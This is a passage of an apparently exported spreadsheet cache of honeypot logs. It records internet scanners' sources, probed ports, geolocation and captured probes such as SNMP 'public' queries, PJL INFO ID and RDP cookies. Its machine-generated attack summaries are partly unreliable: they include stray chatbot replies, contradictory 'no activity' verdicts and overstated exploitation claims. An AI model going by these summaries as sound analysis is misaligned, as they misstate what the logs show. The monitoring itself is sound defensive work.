B_MSSQL_H12&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_FTP_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;21&amp;&amp;9100&amp;&amp;143&amp;&amp;3306&amp;&amp;5432&amp;&amp;43159&amp;&amp;5900&amp;&amp;1521&amp;&amp;1433&amp;&amp;389&amp;&amp;23&amp;&amp;161&amp;&amp;49523&amp;&amp;54772&amp;&amp;110&amp;&amp;6379&amp;&amp;53757"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:189e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit vulnerabilities in various services, likely as part of a reconnaissance phase or a larger malicious campaign. They are using scripts to automate the scanning process and try to bypass security measures."/>
    <s v=" Credential harvesting and authentication attempts via different protocols like FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, POP3, RDP, SMB, SMTP, SNMP, etc. &amp;&amp; Scanning Probe"/>
  </r>
  <r>
    <x v="269"/>
    <x v="269"/>
    <s v="NA&amp;&amp;centered.monitoring.internet-measurement.com"/>
    <x v="0"/>
    <d v="2025-04-30T04:11:51"/>
    <d v="2024-12-14T13:17:38"/>
    <d v="2025-04-30T04:11:51"/>
    <n v="311"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_SOCKS5_H8"/>
    <s v="389&amp;&amp;443&amp;&amp;6379&amp;&amp;21&amp;&amp;1080&amp;&amp;6667&amp;&amp;5432&amp;&amp;3306&amp;&amp;46891&amp;&amp;1521&amp;&amp;25&amp;&amp;143&amp;&amp;23&amp;&amp;NA&amp;&amp;110&amp;&amp;9100&amp;&amp;1433&amp;&amp;3389&amp;&amp;43381&amp;&amp;41813&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;login&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'hvnjlpdf', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.137;tag=hvnjlpdf', 'max-forwards': '0', 'to': 'sip:103.113.68.70', 'via': 'SIP/2.0/UDP 185.247.137.137:5060;branch=z9hG4bKhvnjlpdf;received=185.247.137.137;rport=44424'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'lrpqistn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.137;tag=lrpqistn', 'max-forwards': '0', 'to': 'sip:185.255.123.181', 'via': 'SIP/2.0/UDP 185.247.137.137:5060;branch=z9hG4bKlrpqistn;received=185.247.137.137;rport=47787'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.117.64:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.137,59239)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.26.156.60:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.171.39:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f7:8989"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log data indicates that there is currently no information available about any detected malicious activity. There are no logs indicating any suspicious connections or attempts to exploit vulnerabilities. The system has not captured any relevant activity yet. &amp;&amp; Possible malicious activity: Attempts to access Redis service without specifying any data, potentially probing for vulnerabilities or testing accessibility. This behavior may indicate reconnaissance or initial exploitation steps by an attacker. The lack of data suggests a check for presence rather than actual data transmission."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="270"/>
    <x v="270"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:11:19"/>
    <d v="2023-12-04T10:11:00"/>
    <d v="2025-04-30T04:11:19"/>
    <n v="997"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_HTTP_H36&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POSTGRES_H20&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_MSSQL_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;55650&amp;&amp;1080&amp;&amp;22&amp;&amp;30202&amp;&amp;1521&amp;&amp;110&amp;&amp;3306&amp;&amp;143&amp;&amp;6379&amp;&amp;1433&amp;&amp;NA&amp;&amp;23&amp;&amp;3389&amp;&amp;80&amp;&amp;443&amp;&amp;3262&amp;&amp;51787&amp;&amp;53814&amp;&amp;161&amp;&amp;5432&amp;&amp;51968&amp;&amp;51822&amp;&amp;5900&amp;&amp;56621&amp;&amp;445&amp;&amp;9100&amp;&amp;21&amp;&amp;6667&amp;&amp;49194&amp;&amp;55145&amp;&amp;49481&amp;&amp;55700&amp;&amp;55821&amp;&amp;53990&amp;&amp;49616&amp;&amp;53258&amp;&amp;49621&amp;&amp;55496&amp;&amp;52271&amp;&amp;49506&amp;&amp;55784&amp;&amp;51814&amp;&amp;51398"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FXWtTxQsF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zjACTF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CVEvKu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aTGsWisWR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=URvkKu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zrsGJT'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EXpEQC'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,64274)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,64284)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=waEPPDSST'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gxuThe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JaPAwF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=owNBqvIXH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=srknKU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DvOsLI'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uCtuAfeTK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vtMjzE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZkuSVQ'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,65260)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oCiaHcNBI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MZoWbJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UuoINE'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xVCcdh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vTpfTn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ufgyIReRt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LRHMrq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WnIHGJ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,61356)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:84de"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit various services on a network, including identifying open ports, performing reconnaissance, and potentially executing malicious commands. &amp;&amp; The attackers are attempting to scan for active services and potential vulnerabilities on the target system. They are using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5 to gather information about the system's configuration and potential weaknesses. &amp;&amp; The malicious activities being performed by the attackers suggest that they are engaging in reconnaissance and exploitation of vulnerabilities to gain unauthorized access to systems and services. The attackers are trying to identify potential entry points, probe for weaknesses, and exploit them to install malware or steal sensitive information. &amp;&amp; The attacker is probing various services and protocols to identify potential vulnerabilities, possibly leading to exploitation. They are also attempting to authenticate with different credentials and accessing sensitive information. &amp;&amp; Based on the data, it appears that an attacker is attempting to scan and gather information about various services on a network. The attacker is likely using a port scanner or a vulnerability scanner to identify open ports and probe for vulnerabilities. &amp;&amp; This log data is empty, indicating that there are no records of malicious activity detected. It suggests that either the service was not active or the system did not capture any suspicious traffic. No threats were identified based on the provided information. &amp;&amp; A suspicious incoming SMB connection was detected from an IP address that may indicate a potential malware or ransomware attack attempt. The IP address 147.185.132.222 attempted to establish a connection on port 61356 for unknown purposes. Further investigation is needed to determine the intent behind this connection. &amp;&amp; Unknown IRC service activity detected, possibly attempting to connect or establish a connection. The data is incomplete or unavailable for analysis. Further investigation is required to determine the malicious intent. &amp;&amp; No data provided, cannot analyze. &amp;&amp; The data suggests an attempt to gather information about system configuration, likely for reconnaissance or mapping purposes of the target network._x000a_This is a common initial step by malicious actors to assess vulnerabilities and prepare for further attacks._x000a_No additional information was available through SNMP. &amp;&amp; This indicates a potential scan for LDAP vulnerability, where an attacker is probing for weaknesses in the system's authentication mechanism. _x000a_The absence of specific LDAP-related information suggests it might be a reconnaissance attempt rather than an actual login attempt. _x000a_The activity appears to be an exploratory phase before potentially launching a more targeted attack."/>
    <s v="Scanning and exploitation of various services &amp;&amp; Scanning &amp;&amp;   &amp;&amp;  Port scanning and credential stuffing.  &amp;&amp; The attacker is also trying to authenticate with different services, such as FTP, HTTP, HTTPS, IMAP, LDAP, MSSQL, MYSQL, NTP, Oracle, POP3, RDP, SMTP, SNMP, and SMB. This suggests that the attacker may be attempting to gain unauthorized access or exploit vulnerabilities in these services. &amp;&amp; I'm ready when you provide the log data. Please go ahead and share it. I'll analyze it and provide the requested information. &amp;&amp; SMB Scan &amp;&amp; I'd be happy to analyze some log data! However, you haven't provided any. Please go ahead and provide the log data from the honeypot monitoring malicious activities. I'll do my best to analyze it and identify the type of attack in a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="271"/>
    <x v="271"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:10:18"/>
    <d v="2024-04-01T18:40:00"/>
    <d v="2025-04-30T04:10:18"/>
    <n v="318"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA